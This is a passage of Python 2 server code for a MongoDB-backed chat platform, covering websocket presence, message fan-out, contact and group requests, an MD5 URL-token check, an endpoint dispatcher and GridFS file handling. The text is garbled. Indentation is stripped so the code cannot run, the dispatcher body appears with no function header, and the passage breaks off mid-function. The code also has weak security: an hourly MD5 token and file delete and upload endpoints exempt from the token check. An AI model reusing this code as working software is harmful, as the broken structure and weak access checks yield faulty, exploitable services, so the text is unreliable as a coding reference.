def group_update(session, querydict):
ret = ''
if querydict.has_key('_id') and len(querydict['_id'])>0:
try:
_id = db_util.add_mongo_id(querydict['_id'])
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_groups'])
existone = collection.find_one({'_id':_id})
if existone:
del querydict['_id']
querydict['update_date'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
collection.update({'_id':existone['_id']}, {'$set': db_util.add_mongo_id(querydict)}, multi=False, upsert=False)
one = collection.find_one({'_id':_id})
ret = json.dumps(db_util.remove_mongo_id(one), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'group_update_group_not_exist'}, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'group_update_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'group_update_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'group_update_fail_group_id_required'}, ensure_ascii=True, indent=4)
return ret
def group_remove(session, querydict):
ret = ''
if querydict.has_key('_id') and len(querydict['_id']) > 0:
try:
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_groups'])
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.remove({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'group_remove_fail_group_not_exist'}, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'group_remove_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'group_remove_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'group_remove_fail_found_group_id_required'}, ensure_ascii=True, indent=4)
return ret
def check_contact_exist(_id, alist):
ret = None
for i in alist:
if i['_id'] == _id:
ret = i
break
return ret
def online(user_id, websocket):
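        # Register an open websocket under the user's id in the global socket map
        # (one user may hold several connections at once).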
if user_id and websocket and not websocket.closed:
if not gWebSocketsMap.has_key(user_id):
gWebSocketsMap[user_id] = []
if not websocket in gWebSocketsMap[user_id]:
gWebSocketsMap[user_id].append(websocket)
def offline(user_id):
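        # Close and drop every websocket registered for the user, then log a chat/offline
        # entry via chat_save_log.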
if user_id and gWebSocketsMap.has_key(user_id):
for i in gWebSocketsMap[user_id]:
i.close()
del gWebSocketsMap[user_id]
chat_save_log({
'op':'chat/offline',
'from':user_id,
'timestamp':time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
})
def get_destination(session, from_id, _id):
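        # Resolve direct-message recipients: _id (an id/username or a list of ids) is kept
        # only if it appears in the sender's contact list.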
ret = []
if isinstance(_id, str) or isinstance(_id, unicode):
userlist = user_query(session, {'_id':from_id})
if len(userlist)==0:
userlist = user_query(session, {'username':from_id})
if len(userlist)>0:
user0 = userlist[0]
if user0.has_key('contacts'):
toid = _id
try:
toid = ObjectId(_id)
except:
ul = user_query(session, {'username':_id})
if len(ul)>0:
toid = ul[0]['_id']
if db_util.add_mongo_id(str(toid)) in user0['contacts']:
ret.append(str(toid))
elif isinstance(_id, list):
userlist = user_query(session, {'_id':from_id})
if len(userlist)==0:
userlist = user_query(session, {'username':from_id})
if len(userlist)>0:
user0 = userlist[0]
if user0.has_key('contacts'):
for id in _id:
if db_util.add_mongo_id(id) in user0['contacts']:
ret.append(id)
return ret
def get_destination_group(session, from_id, _id):
ret = []
userset = set()
grps = group_query(session, {'_id':_id})
for grp in grps:
if grp.has_key('members') and len(grp['members'])>0:
if db_util.add_mongo_id(from_id) in grp['members']:
userset = userset.union(set(grp['members']))
userlist = list(userset)
for id in userlist:
ret.append(id)
return ret
def resend_offline_msg(session, to_id, limit=10):
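        # Re-deliver up to `limit` messages stored for the user while offline (newest first):
        # they are removed from the offline-log collection and pushed back onto the
        # outgoing queue.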
offlinecol = 'chat_log_offline'
if gConfig['chat_platform']['mongodb'].has_key('collection_chat_log_offline'):
offlinecol = gConfig['chat_platform']['mongodb']['collection_chat_log_offline']
collection = get_collection(offlinecol)
arr = list(collection.find({'to':db_util.add_mongo_id(to_id)}).limit(limit).sort('timestamp', pymongo.DESCENDING))
ids = [i['_id'] for i in arr]
collection.remove({'_id':{'$in': ids}})
for i in arr:
gJoinableQueue.put(db_util.remove_mongo_id(i))
def chat(session, websocket, obj={}):
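        # Fan a chat message out: 'to' is resolved through the sender's contacts,
        # 'to_group' through group membership, and one queue entry is emitted per recipient.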
tolist = []
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('msg') and len(obj['msg'])>0:
if obj.has_key('to') and len(obj['to'])>0:
tolist = get_destination(session, obj['from'], obj['to'])
if obj.has_key('to_group') and len(obj['to_group']) > 0:
tolist = get_destination_group(session, obj['from'], obj['to_group'])
for k in tolist:
try:
d = {'op': 'chat/chat', 'from': obj['from'], 'to': k, 'timestamp': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), 'msg': obj['msg']}
gJoinableQueue.put(d)
except gevent.queue.Full:
print('chat queue is full')
def request_response(session, websocket, obj={}):
#'chat/request/contact/add',
#'chat/request/contact/remove',
#'chat/response/contact/add/accept',
#'chat/response/contact/add/reject'
#'chat/request/group/join'
#'chat/request/group/quit'
#'chat/response/group/join/accept',
#'chat/response/group/join/reject',
tolist = []
try:
if obj['op'] == 'chat/response/contact/add/accept':
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('to') and len(obj['to'])>0:
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_users'])
userlist = user_query(session, {'_id':[obj['from'], obj['to']]})
for user in userlist:
if str(user['_id']) == obj['from'] and not db_util.add_mongo_id(obj['to']) in user['contacts']:
user['contacts'].append(db_util.add_mongo_id(obj['to']))
if str(user['_id']) == obj['to'] and not db_util.add_mongo_id(obj['from']) in user['contacts']:
user['contacts'].append(db_util.add_mongo_id(obj['from']))
user['update_date'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
collection.save(user)
fromuser = {}
fromuser['op'] = obj['op']
fromuser['_id'] = obj['from']
fromuser['from'] = obj['to']
fromuser['to'] = obj['from']
fromuser['contacts'] = json.loads(user_contact_get(session, {'_id':obj['from'],'user_detail':True}))
gJoinableQueue.put(db_util.remove_mongo_id(fromuser))
touser = {}
touser['op'] = obj['op']
touser['_id'] = obj['to']
touser['from'] = obj['from']
touser['to'] = obj['to']
touser['contacts'] = json.loads(user_contact_get(session, {'_id':obj['to'],'user_detail':True}))
gJoinableQueue.put(db_util.remove_mongo_id(touser))
elif obj['op'] == 'chat/response/contact/add/reject':
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('to') and len(obj['to'])>0:
userlist = user_query(session, {'_id':obj['from']})
if len(userlist)>0:
user0 = userlist[0]
user0['op'] = obj['op']
user0['from'] = obj['from']
user0['to'] = obj['to']
if user0.has_key('password'):
del user0['password']
if user0.has_key('contacts'):
del user0['contacts']
if obj.has_key('reject_reason') and len(obj['reject_reason'])>0:
user0['reject_reason'] = obj['reject_reason']
gJoinableQueue.put(db_util.remove_mongo_id(user0))
elif obj['op'] == 'chat/request/contact/add':
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('to') and len(obj['to'])>0:
userlist = user_query(session, {'_id':obj['from']})
if len(userlist)>0:
user0 = userlist[0]
user0['op'] = obj['op']
user0['from'] = obj['from']
user0['to'] = obj['to']
if user0.has_key('password'):
del user0['password']
if user0.has_key('contacts'):
del user0['contacts']
gJoinableQueue.put(db_util.remove_mongo_id(user0))
elif obj['op'] == 'chat/request/contact/remove':
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('to') and len(obj['to'])>0:
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_users'])
userlist = user_query(session, {'_id':[obj['from'], obj['to']]})
remover, removee = None, None
for user in userlist:
if str(user['_id']) == obj['from'] and db_util.add_mongo_id(obj['to']) in user['contacts']:
user['contacts'].remove(db_util.add_mongo_id(obj['to']))
remover = user['display_name']
if str(user['_id']) == obj['to'] and db_util.add_mongo_id(obj['from']) in user['contacts']:
user['contacts'].remove(db_util.add_mongo_id(obj['from']))
removee = user['display_name']
user['update_date'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
collection.save(user)
fromuser = {}
fromuser['op'] = obj['op']
fromuser['_id'] = obj['from']
fromuser['from'] = obj['to']
fromuser['to'] = obj['from']
fromuser['remover'] = remover
fromuser['removee'] = removee
fromuser['remove_type'] = 'remover'
fromuser['contacts'] = json.loads(user_contact_get(session, {'_id':obj['from'], 'user_detail':True}))
gJoinableQueue.put(db_util.remove_mongo_id(fromuser))
touser = {}
touser['op'] = obj['op']
touser['_id'] = obj['to']
touser['from'] = obj['from']
touser['to'] = obj['to']
touser['remover'] = remover
touser['removee'] = removee
touser['remove_type'] = 'removee'
touser['contacts'] = json.loads(user_contact_get(session, {'_id':obj['to'], 'user_detail':True}))
gJoinableQueue.put(db_util.remove_mongo_id(touser))
elif obj['op'] == 'chat/request/group/join':
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('to_group') and len(obj['to_group'])>0:
grps = group_query(session, {'_id':obj['to_group']})
if len(grps)>0:
grp0 = grps[0]
userlist = user_query(session, {'_id':obj['from']})
if len(userlist)>0:
user0 = userlist[0]
user0['op'] = obj['op']
user0['from'] = obj['from']
user0['request_src'] = obj['from']
user0['to_group'] = obj['to_group']
user0['to'] = grp0['owner_id']
if user0.has_key('password'):
del user0['password']
if user0.has_key('contacts'):
del user0['contacts']
gJoinableQueue.put(db_util.remove_mongo_id(user0))
elif obj['op'] == 'chat/request/group/quit':
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('to_group') and len(obj['to_group'])>0:
grps = group_query(session, {'_id':obj['to_group']})
if len(grps)>0:
grp0 = grps[0]
members = []
if db_util.add_mongo_id(obj['from']) in grp0['members']:
grp0['members'].remove(db_util.add_mongo_id(obj['from']))
members = [str(i) for i in grp0['members']]
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_groups'])
collection.save(grp0)
broadcast(session, websocket, members, {'op':obj['op'], 'from':obj['from'], 'to_group':obj['to_group']} )
elif obj['op'] == 'chat/response/group/join/accept':
if obj.has_key('to_group') and len(obj['to_group'])>0 and obj.has_key('request_src') and len(obj['request_src'])>0:
grps = group_query(session, {'_id': obj['to_group']})
if len(grps)>0:
grp0 = grps[0]
if not db_util.add_mongo_id(obj['request_src']) in grp0['members']:
grp0['members'].append(db_util.add_mongo_id(obj['request_src']))
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_groups'])
collection.save(grp0)
members = [str(i) for i in grp0['members']]
broadcast(session, websocket, members, obj)
elif obj['op'] == 'chat/response/group/join/reject':
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('to') and len(obj['to'])>0 and obj.has_key('to_group') and len(obj['to_group'])>0:
userlist = user_query(session, {'_id':obj['from']})
if len(userlist)>0:
user0 = userlist[0]
user0['op'] = obj['op']
user0['from'] = obj['from']
user0['to'] = obj['to']
user0['to_group'] = obj['to_group']
if user0.has_key('password'):
del user0['password']
if user0.has_key('contacts'):
del user0['contacts']
if obj.has_key('reject_reason') and len(obj['reject_reason'])>0:
user0['reject_reason'] = obj['reject_reason']
gJoinableQueue.put(db_util.remove_mongo_id(user0))
#else:
#d = {'op': obj['op'], 'from':obj['from'], 'to':k, 'timestamp':time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),}
#gJoinableQueue.put(d)
except gevent.queue.Full:
print('chat queue is full')
def broadcast(session, websocket, alist, obj={}):
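        # Push a copy of obj to every entry of alist (user id strings or user dicts),
        # setting 'to' per recipient.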
for i in alist:
d = {}
#d['timestamp'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
for k in obj.keys():
d[k] = obj[k]
if isinstance(i, str) or isinstance(i, unicode):
d['to'] = i
elif isinstance(i, dict):
if i.has_key('_id'):
d['to'] = i['_id']
try:
gJoinableQueue.put(d)
except:
pass
def handle_websocket(environ):
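        # Per-connection websocket loop: polls the socket at the configured interval and
        # dispatches chat/online, chat/offline, chat/chat and chat/request|response messages;
        # when no message arrives an empty frame is sent so dead sockets are detected and
        # taken offline.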
ws = get_websocket(environ)
app = gConfig['wsgi']['application']
#session_id = None
#channel = ''
#if environ.has_key('HTTP_COOKIE'):
#arr = environ['HTTP_COOKIE'].split('=')
#if len(arr)>1:
#session_id = arr[1]
interval = 1.0
try:
interval = float(gConfig[app]['websocket']['interval_poll'])
except:
interval = 1.0
while ws and not ws.closed:
obj = ws_recv(environ)
if obj and isinstance(obj, dict) and obj.has_key('op'):
if obj['op'] == 'queue_size':
qsize = 0
if gJoinableQueue:
qsize = gJoinableQueue.qsize()
ws.send(json.dumps({'queue_size':qsize}, ensure_ascii=True, indent=4))
elif obj['op'] == 'chat/online':
rec = []
if obj.has_key('_id') and len(obj['_id'])>0:
rec = user_query(session, {'_id':obj['_id']})
elif obj.has_key('username') and len(obj['username'])>0:
rec = user_query(session, {'username':obj['username']})
if len(rec)>0:
r0 = rec[0]
_id = str(r0['_id'])
online(_id, ws)
r0['contacts'] = json.loads(user_contact_get(session, {'_id':_id,'user_detail':True}))
r0['groups'] = json.loads(user_group_get(session, {'_id':_id,'user_detail':True}))
d = db_util.remove_mongo_id(r0)
d['op'] = obj['op']
d['from'] = _id
d['to'] = _id
d['timestamp'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
gJoinableQueue.put(d)
#ws.send(json.dumps(d, ensure_ascii=True, indent=4))
if obj.has_key('inform_contact') and obj['inform_contact'] is True:
other_contacts = gWebSocketsMap.keys()[:]
if _id in other_contacts:
other_contacts.remove(_id)
broadcast(session, ws, other_contacts, {'op':'chat/info/online','from':_id})
limit = 10
if gConfig['chat_platform'].has_key('resend') and gConfig['chat_platform']['resend'].has_key('max_resend_record_num'):
try:
limit = int(gConfig['chat_platform']['resend']['max_resend_record_num'])
except:
pass
resend_offline_msg(session, _id, limit)
else:
ws.send(json.dumps({'result':'chat_online_user_not_exist'}, ensure_ascii=True, indent=4))
elif obj['op'] == 'chat/offline':
if obj.has_key('_id'):
_id = obj['_id']
if obj.has_key('inform_contact') and obj['inform_contact'] is True:
other_contacts = gWebSocketsMap.keys()[:]
if _id in other_contacts:
other_contacts.remove(_id)
broadcast(session, ws, other_contacts, {'op':'chat/info/offline','from':_id, 'timestamp': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())})
offline(_id)
elif obj.has_key('username'):
rec = user_query(session, {'username':obj['username']})
if len(rec)>0:
_id = str(rec[0]['_id'])
if obj.has_key('inform_contact') and obj['inform_contact'] is True:
other_contacts = gWebSocketsMap.keys()[:]
if _id in other_contacts:
other_contacts.remove(_id)
broadcast(session, ws, other_contacts, {'op':'chat/info/offline','from':_id})
offline(_id)
else:
ws.send(json.dumps({'result':'chat_offline_user_not_exist'}, ensure_ascii=True, indent=4))
else:
ws.send(json.dumps({'result':'chat_offline_username_or_id_required'}, ensure_ascii=True, indent=4))
elif obj['op'] == 'chat/chat':
chat(session, ws, obj)
elif 'chat/request' in obj['op'] or 'chat/response' in obj['op']:
request_response(session, ws, obj)
else:
try:
ws.send('')
except:
_id = None
for k in gWebSocketsMap.keys():
if ws in gWebSocketsMap[k] :
_id = k
break
if _id:
print('websocket[%s] is closed2' % _id)
offline(_id)
broadcast(session, None, gWebSocketsMap.keys(), {'op':'chat/info/offline', 'from':_id})
gevent.sleep(interval)
if ws and ws.closed:
del ws
def check_url_token(querydict):
is_token_pass = False
enable_url_md5_check = False
md5prefix = ''
if gConfig['chat_platform'].has_key('security') \
and gConfig['chat_platform']['security'].has_key('md5prefix'):
md5prefix = str(gConfig['chat_platform']['security']['md5prefix'])
if gConfig['chat_platform'].has_key('security') \
and gConfig['chat_platform']['security'].has_key('enable_url_md5_check') \
and gConfig['chat_platform']['security']['enable_url_md5_check'].lower() == 'true':
enable_url_md5_check = True
else:
is_token_pass = True
if enable_url_md5_check:
print('checking token...')
if querydict.has_key('_token'):
plain = '%s_|_%s' % (md5prefix, time.strftime('%Y%m%d%H'))
token = md5.new(plain).hexdigest()
if token == str(querydict['_token']):
is_token_pass = True
return is_token_pass
def chat_broadcast(session, querydict):
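        # HTTP entry point: push a message from 'from' to one or more 'to' recipients
        # through the shared queue (no contact-list check is applied here).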
ret = '{}'
tolist = []
if querydict.has_key('from') and len(querydict['from'])>0:
if querydict.has_key('to'):
if isinstance(querydict['to'], str) or isinstance(querydict['to'], unicode):
tolist.append(querydict['to'])
if isinstance(querydict['to'], list):
tolist.extend(querydict['to'])
else:
ret = json.dumps({'result':u'chat_broadcast_to_required'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'chat_broadcast_from_required'}, ensure_ascii=True, indent=4)
if querydict.has_key('msg') and len(querydict['msg'])>0:
for k in tolist:
try:
d = {'op': 'chat/chat', 'from': querydict['from'], 'to': k, 'timestamp': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), 'msg': querydict['msg']}
gJoinableQueue.put(d)
except gevent.queue.Full:
print('chat queue is full')
ret = json.dumps({'result':u'chat queue is full'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'chat_broadcast_msg_required'}, ensure_ascii=True, indent=4)
return ret
def chat_log_query(session, querydict):
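        # Return the stored chat history exchanged between 'from' and 'to' (in either
        # direction), newest first, honouring limit/skip.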
limit = 0
skip = 0
filter_str = ''
from_id, to_id = None, None
if querydict.has_key('from') and (isinstance(querydict['from'], str) or isinstance(querydict['from'], unicode)) and len(querydict['from'])>0:
from_id = querydict['from']
if querydict.has_key('to') and (isinstance(querydict['to'], str) or isinstance(querydict['to'], unicode)) and len(querydict['to'])>0:
to_id = querydict['to']
if from_id is None or to_id is None:
return json.dumps({'result':u'chat_log_query_from_and_to_required'}, ensure_ascii=True, indent=4)
if querydict.has_key('limit'):
try:
limit = int(querydict['limit'])
except:
pass
del querydict['limit']
if querydict.has_key('skip'):
try:
skip = int(querydict['skip'])
except:
pass
del querydict['skip']
if querydict.has_key('filter'):
filter_str = querydict['filter']
del querydict['filter']
# offlinecol = 'chat_log_offline'
# if gConfig['chat_platform']['mongodb'].has_key('collection_chat_log_offline'):
# offlinecol = gConfig['chat_platform']['mongodb']['collection_chat_log_offline']
collection1 = get_collection(gConfig['chat_platform']['mongodb']['collection_chat_log'])
# collection2 = get_collection(offlinecol)
ret = list(collection1.find({'$or':[{'from':db_util.add_mongo_id(from_id), 'to':db_util.add_mongo_id(to_id)}, {'to':db_util.add_mongo_id(from_id), 'from':db_util.add_mongo_id(to_id)}]}).limit(limit).skip(skip).sort('timestamp', pymongo.DESCENDING))
# arr2 = list(collection2.find({'$or':[{'from':db_util.add_mongo_id(from_id), 'to':db_util.add_mongo_id(to_id)}, {'to':db_util.add_mongo_id(from_id), 'from':db_util.add_mongo_id(to_id)}]}).limit(limit).skip(skip).sort('timestamp', pymongo.DESCENDING))
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
return ret
def chat_log_remove(session, querydict):
return ''
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
isnew = False
urls = gUrlMap.bind_to_environ(environ)
querydict, buf = get_querydict_by_GET_POST(environ)
endpoint = ''
try:
endpoint, args = urls.match()
if endpoint not in ['handle_websocket', 'gridfs_upload', 'gridfs_get', 'gridfs_delete', 'gridfs_query']:
if not check_url_token(querydict):
body = json.dumps({'result':u'invalid_token'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
if querydict.has_key('_token'):
del querydict['_token']
if endpoint == 'user_add':
body = user_add(session, querydict)
elif endpoint == 'user_remove':
body = user_delete(session, querydict)
elif endpoint == 'user_get':
body = user_get(session, querydict)
elif endpoint == 'all_user_get':
body = all_user_get(session, querydict)
elif endpoint == 'user_update':
body = user_update(session, querydict)
elif endpoint == 'group_add':
body = group_add(session, querydict)
elif endpoint == 'group_get':
body = group_get(session, querydict)
elif endpoint == 'user_group_get':
body = user_group_get(session, querydict)
elif endpoint == 'user_contact_get':
body = user_contact_get(session, querydict)
elif endpoint == 'group_update':
body = group_update(session, querydict)
elif endpoint == 'group_remove':
body = group_remove(session, querydict)
elif endpoint == 'handle_websocket':
handle_websocket(environ)
elif endpoint == 'chat_broadcast':
body = chat_broadcast(session, querydict)
elif endpoint == 'chat_log_query':
body = chat_log_query(session, querydict)
elif endpoint == 'chat_log_remove':
body = chat_log_remove(session, querydict)
elif endpoint == 'gridfs_upload':
body = gridfs_upload(environ, querydict, buf)
elif endpoint == 'gridfs_get':
if args.has_key('_id'):
querydict['_id'] = args['_id']
if args.has_key('width'):
try:
querydict['width'] = int(args['width'])
except:
querydict['width'] = 64
if args.has_key('height'):
try:
querydict['height'] = int(args['height'])
except:
querydict['height'] = 64
statuscode, headers, body = gridfs_get(environ, querydict)
elif endpoint == 'gridfs_delete':
if args.has_key('_id'):
querydict['_id'] = args['_id']
statuscode, headers, body = gridfs_delete(environ, querydict)
elif endpoint == 'gridfs_query':
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
if ',' in querydict['_id']:
querydict['_id'] = querydict['_id'].split(',')
else:
querydict['_id'] = [querydict['_id'],]
if args.has_key('width'):
try:
querydict['width'] = int(args['width'])
except:
querydict['width'] = 64
if args.has_key('height'):
try:
querydict['height'] = int(args['height'])
except:
querydict['height'] = 64
if args.has_key('limit'):
try:
querydict['limit'] = int(args['limit'])
except:
querydict['limit'] = 10
if args.has_key('skip'):
try:
querydict['skip'] = int(args['skip'])
except:
querydict['skip'] = 0
statuscode, headers, body = gridfs_query(environ, querydict)
else:
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
except HTTPException, e:
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
if session:
gSessionStore.save(session)
return statuscode, headers, body
def gridfs_get(environ, querydict):
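    # Serve one GridFS file by _id. When width/height are supplied the response is a
    # thumbnail instead (non-image mimetypes fall back to a placeholder icon from the
    # configured thumbnail map); 'attachmentdownload' adds a Content-Disposition header.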
global gConfig, ENCODING, STATICRESOURCE_DIR
def thumbnail(fp, size, use_base64=False):
ret = None
if 'image/' in fp.mimetype:
im = Image.open(fp)
im.thumbnail(size)
buf = StringIO.StringIO()
#print(im.format)
im.save(buf, im.format)
ret = buf.getvalue()
if use_base64:
ret = base64.b64encode(ret)
if 'application/' in fp.mimetype or 'text/' in fp.mimetype:
thumpath = gConfig['web']['thumbnail']['application/octet-stream']
if gConfig['web']['thumbnail'].has_key(fp.mimetype):
thumpath = gConfig['web']['thumbnail'][fp.mimetype]
thumpath = os.path.join(STATICRESOURCE_DIR, 'img', 'thumbnail', thumpath)
im = Image.open(thumpath)
im.thumbnail(size)
buf = StringIO.StringIO()
im.save(buf, im.format)
ret = buf.getvalue()
if use_base64:
ret = base64.b64encode(ret)
return ret
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
body = ''
statuscode = '200 OK'
if querydict.has_key('_'):
del querydict['_']
if querydict.has_key('_random'):
del querydict['_random']
if not querydict.has_key('_id'):
body = json.dumps({'result': u'gridfs_get_id_required'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
app = gConfig['wsgi']['application']
if gConfig.has_key(app):
collection = 'fs'
if gConfig[app].has_key('mongodb') and gConfig[app]['mongodb'].has_key('gridfs_collection'):
collection = str(gConfig[app]['mongodb']['gridfs_collection'])
if len(collection) == 0:
collection = 'fs'
db_util.mongo_init_client(app)
dbname = gConfig[app]['mongodb']['database']
db = db_util.gClientMongo[app][dbname]
fs = gridfs.GridFS(db, collection=collection)
_id = db_util.add_mongo_id(querydict['_id'])
try:
f = fs.get(_id)
headers['Content-Type'] = str(f.content_type)
if querydict.has_key('width') and querydict.has_key('height') \
and querydict['width']>0 and querydict['width']<8192 \
and querydict['height']>0 and querydict['height']<8192 :
if 'image/' in f.content_type:
body = thumbnail(f, (querydict['width'], querydict['height']), False)
else:
body = thumbnail(f, (128, 128), False)
headers['Content-Type'] = 'image/png'
if body is None:
body = json.dumps({'result': u'gridfs_get_error_invalid_image_format'}, ensure_ascii=True, indent=4)
else:
body = f.read()
if querydict.has_key('attachmentdownload'):
headers['Content-Disposition'] = 'attachment;filename="' + enc(f.filename) + '"'
except gridfs.errors.NoFile:
body = json.dumps({'result': u'gridfs_get_file_not_exist'}, ensure_ascii=True, indent=4)
except Exception,e:
headers['Content-Type'] = 'text/json;charset=' + ENCODING
body = json.dumps({'result': u'gridfs_get_error:%s' % e.message}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result': u'gridfs_get_cannot_find_wsgi_app [%s]' % app}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def gridfs_delete(environ, querydict):
global gConfig, ENCODING
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
body = ''
statuscode = '200 OK'
if querydict.has_key('_'):
del querydict['_']
if querydict.has_key('_random'):
del querydict['_random']
if not querydict.has_key('_id'):
body = json.dumps({'result': u'gridfs_delete_id_required'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
app = gConfig['wsgi']['application']
if gConfig.has_key(app):
collection = 'fs'
if gConfig[app].has_key('mongodb') and gConfig[app]['mongodb'].has_key('gridfs_collection'):
collection = str(gConfig[app]['mongodb']['gridfs_collection'])
if len(collection) == 0:
collection = 'fs'
db_util.mongo_init_client(app)
dbname = gConfig[app]['mongodb']['database']
db = db_util.gClientMongo[app][dbname]
fs = gridfs.GridFS(db, collection=collection)
arr = querydict['_id'].split(',')
ids = []
for i in arr:
ids.append(db_util.add_mongo_id(i))
try:
for i in ids:
fs.delete(i)
body = json.dumps(querydict, ensure_ascii=True, indent=4)
except Exception,e:
body = json.dumps({'result': u'gridfs_delete_error:%s' % e.message}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result': u'gridfs_delete_cannot_find_wsgi_app [%s]' % app}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def gridfs_query(environ, querydict):
global gConfig, ENCODING, STATICRESOURCE_DIR
def thumbnail(fp, size, use_base64=False):
ret = None
if 'image/' in fp.mimetype:
im = Image.open(fp)
im.thumbnail(size)
buf = StringIO.StringIO()
#print(im.format)
im.save(buf, im.format)
ret = buf.getvalue()
if use_base64:
ret = base64.b64encode(ret)
if 'application/' in fp.mimetype or 'text/' in fp.mimetype:
thumpath = gConfig['web']['thumbnail']['application/octet-stream']
if gConfig['web']['thumbnail'].has_key(fp.mimetype):
thumpath = gConfig['web']['thumbnail'][fp.mimetype]
thumpath = os.path.join(STATICRESOURCE_DIR, 'img', 'thumbnail', thumpath)
im = Image.open(thumpath)
im.thumbnail(size)
buf = StringIO.StringIO()
im.save(buf, im.format)
ret = buf.getvalue()
if use_base64:
ret = base64.b64encode(ret)
return ret
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
body = '[]'
statuscode = '200 OK'
app = gConfig['wsgi']['application']
if querydict.has_key('_'):
del querydict['_']
if querydict.has_key('_random'):
del querydict['_random']
if gConfig.has_key(app):
collection = 'fs'
if gConfig[app].has_key('mongodb') and gConfig[app]['mongodb'].has_key('gridfs_collection'):
collection = str(gConfig[app]['mongodb']['gridfs_collection'])
if len(collection) == 0:
collection = 'fs'
db_util.mongo_init_client(app)
dbname = gConfig[app]['mongodb']['database']
db = db_util.gClientMongo[app][dbname]
fs = gridfs.GridFS(db, collection=collection)
limit = 10
skip = 0
if querydict.has_key('limit'):
limit = querydict['limit']
del querydict['limit']
if querydict.has_key('skip'):
skip = querydict['skip']
del querydict['skip']
try:
if querydict.has_key('width') and querydict.has_key('height') \
and querydict['width']>0 and querydict['width']<8192 \
and querydict['height']>0 and querydict['height']<8192 :
w, h = querydict['width'], querydict['height']
del querydict['width']
del querydict['height']
cur = None
if querydict.has_key('_id'):
ids = db_util.add_mongo_id(querydict['_id'])
cur = fs.find({'_id':{'$in':ids}}).limit(limit).skip(skip)
else:
cur = fs.find(db_util.add_mongo_id(querydict)).limit(limit).skip(skip)
arr = []
for f in cur:
b64str = thumbnail(f, (w, h), True)
if 'application/' in f.content_type:
f.mimetype = 'image/png'
arr.append({'_id':db_util.remove_mongo_id(f._id), 'mimetype':f.mimetype,'filename':enc(f.filename), 'data': b64str})
body = json.dumps(arr, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result': u'gridfs_query_size_required'}, ensure_ascii=True, indent=4)
except gridfs.errors.NoFile:
body = json.dumps({'result': u'gridfs_query_file_not_exist'}, ensure_ascii=True, indent=4)
except Exception,e:
body = json.dumps({'result': u'gridfs_query_error:%s' % e.message}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result': u'gridfs_query_cannot_find_wsgi_app [%s]' % app}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def gridfs_upload(environ, querydict, buf):
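    # Store the uploaded buffer in GridFS, using the remaining query parameters as file
    # metadata. '_uniqueIndex' may name comma-separated metadata fields; when two or more
    # of them are present, older files matching that combination are deleted before the
    # new file is written, so the upload behaves like an upsert.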
global gConfig
app = gConfig['wsgi']['application']
body = ''
if gConfig.has_key(app):
collection = 'fs'
if gConfig[app].has_key('mongodb') and gConfig[app]['mongodb'].has_key('gridfs_collection'):
collection = str(gConfig[app]['mongodb']['gridfs_collection'])
if len(collection) == 0:
collection = 'fs'
db_util.mongo_init_client(app)
dbname = gConfig[app]['mongodb']['database']
db = db_util.gClientMongo[app][dbname]
if querydict.has_key('file_id'):
del querydict['file_id']
fs = gridfs.GridFS(db, collection=collection)
_id = None
try:
            querydict = db_util.add_mongo_id(querydict)
if querydict.has_key('_uniqueIndex'):
uniqueIndex = querydict['_uniqueIndex']
cond = {}
if (isinstance(uniqueIndex, unicode) or isinstance(uniqueIndex, str)) and len(uniqueIndex)>0:
